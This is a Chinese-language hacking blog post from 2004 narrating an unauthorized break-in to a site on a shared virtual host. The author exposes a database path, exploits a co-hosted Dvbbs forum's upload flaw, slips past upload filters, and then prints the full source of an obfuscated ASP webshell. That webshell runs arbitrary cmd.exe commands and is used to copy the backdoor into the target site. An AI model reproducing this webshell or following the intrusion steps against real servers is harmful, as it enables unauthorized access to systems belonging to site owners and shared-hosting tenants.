CSDN博客

img secteam

对一个安全设置比较BT的虚拟主机的安全测试

发表于2004/10/15 17:09:00  1108人阅读

分类: 文摘·黑客攻防

作者:血汉 文章来源:www.qfaq.com

前几天无聊时看到一个木马站,然后就对他进行了一番安全测试,发现是在一个虚拟主机上的,而虚拟主机的安全设置又比较高,我今天就把我是怎么进入这个木马站的经过写出来,里面没有设计到什么技术性的东西,只是把这次的思路说下,因为经验才是最重要的!
  首先看了下站.发现是动力的系统,看了下版本MyPower Ver3.51,当时还比较新,注入过滤的比较好,上传的地方也不能进行传ASP木马,当时就郁闷了,看了下能不能暴库,直接输入http://www.******.com/inc/conn.asp数据库直接暴了出来:

晕了,这么长的名字!!!现在我就可以把他的数据库给下来,然后去跑MD5密码,但是这样太费时间,又不是我等所为!在他的站转了一圈,发现没有什么可以利用的地方,于是用whois查了查他的主机上有多少站,http://whois.webhosting.info/*.*.*.*,一看,- IP hosts 118 Total Domains ... 
Showing 1 - 50 out of 118 
晕,怎么多,一个个的找找,麻烦的就不要看了,运气不错,找到一个动网论坛的,Dvbbs Version 6.1.0,看看upfile.asp,发现存在,直接用动网的漏洞利用工具上传一个ASP木马,显示是成功了,不过打开看的时候发现了"当前目录禁止运行asp程序的相关提示",晕,郁闷!!!看来非要手工不可了,不过手工上传偶是轻车熟路,把目录改成根目录,这里不可能不能运行asp程序了!
这里我就带过了,不熟悉的朋友可以去清风上找我以前的哪个动画教程!最后到了这里:

按此在新窗口打开图片

本来想接下来的事情会很顺利,那知道所有的难题都出在这里了!
   我本想先传一个海阳顶端的asp木马,但是当点保存的时候却出现了这样的情况,

按此在新窗口打开图片

我哪个晕啊,看来主机有信息拦截系统,我们不怕,我把asp网页加密下再试试!

郁闷中,刚才的警告信息又出来了,后来和几个朋友讨论了下,猜测他们的主机上的asp.dll文件把asp文件的上传给过滤了,算了,再辛苦下,直接手工传我们的asp木马,不过现在你要找个小点的了,因为太大的木马抓包的时候会很麻烦!我用的是猪蛋儿的那个独家后门!最后成功:

按此在新窗口打开图片

进去后发现主机做了安全策略,不管怎么跳转都只能在这一个目录里看,虽然我知道了那个木马站的实际路径,但是就是写不进去,而且主机也不允许在web里传asp程序,郁闷,命令也不可以执行,看来我们得到了一个没有什么用处的webshell!
  我找来了动鲨写的一个asp木马:

<%@ LANGUAGE="VBScript"  cODEpagE ="936" %>
<ObjEct Runat=sERvER iD=OFilElh scOpE=pagE classiD="clsiD:0D43FE01-F093-11CF-8940-00A0C9054228"></ObjEct>
<ObjEct runat=sErvEr iD=OScriptlhn scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%iF Err thEn%>
<ObjEct runat=sErvEr iD=OScriptlhn scOpE=pagE classiD="clsiD:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></ObjEct> 
<%EnD iF %>
<html>
<bODy>
<FORM ACtiOn="<%= REquEst.SErvErVAriAblEs("URL") %>" MEthOD="POST">
  <p>
    <input typE=tExt namE="cmD" sizE=60>
    <input typE=submit valuE="run">
  </p>
  <p><FOnt cOlOr="#0000FF">不管服务器是否修改了WSH的名字,都可以使用。</FOnt> </p>
  <p><FOnt cOlOr="#0000FF">动鲨制作,祝你好运!QQ:178383587</FOnt></p>
</FOrm>
<%  

Dim lhtmp
 On ErrOr rEsumE nExt  
 lhtmp = SERvER.MapPath("/")
 lhtmp = lhtmp + "/lhtmp.txt"
 call OScriptlhn.run ("D:/website/www.****.com/Web/cmD.EXE  /c " & rEquEst.FOrm("cmD") & ">" & lhtmp,0,truE)
 SEt OFilE = OFilElh.OpEnTExtFilE (lhtmp, 1, FAlsE, 0) 
%>
<PRE>
<br>
<% 
  IF (IsObjECt(OFilE)) ThEn
   On ErrOr rEsumE nExt
    REspOnsE.WritE sErvEr.htmlEncODE(OFilE.READAll)
    OFilE.ClOsE
    CAll OFilElh.DElEtEFilE(lhtmp, TruE)
  EnD IF
%>
</bODy>
</html>

然后我从本机上传一个cmd.exe到他的目录,本来想再传一个serv-u的溢出工具,但是扫了下他开放的端口,一看原来是微软的ftp,我哪个郁闷!
现在我虽然可以执行一点命令了,但是还是不能到木马站的哪个目录里,忽然想起了我不是知道他的实际目录吗,他的这个目录一定可写,要是不可写那他的站就没有办法管理了,不何不用copy命令把这里的asp木马copy过去! 偶为偶的想法激动了一会,然后就执行了下命令:

按此在新窗口打开图片

打开看看成功了没有:

娃哈哈,成功了也!下面的事情我就不说了,我已经达到了渗透的目的,不过拿主机权限应该是比较难的啦!偶就不再继续了!

阅读全文
0 0

相关文章推荐

img
取 消
img